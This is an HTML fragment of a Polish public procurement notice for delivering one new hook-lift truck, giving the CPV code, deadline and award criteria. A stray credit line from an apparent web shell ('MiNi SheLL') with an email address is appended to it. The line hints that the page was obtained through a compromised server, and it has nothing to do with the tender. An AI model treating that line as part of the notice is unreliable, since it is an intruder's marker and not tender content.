<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa samochodu ciężarowego z zabudową hakową w ilości 1 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczony samochód ciężarowy winien być fabrycznie nowy, nieużywany i 
    nierejestrowany - rok produkcji 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.90.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji jakości - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com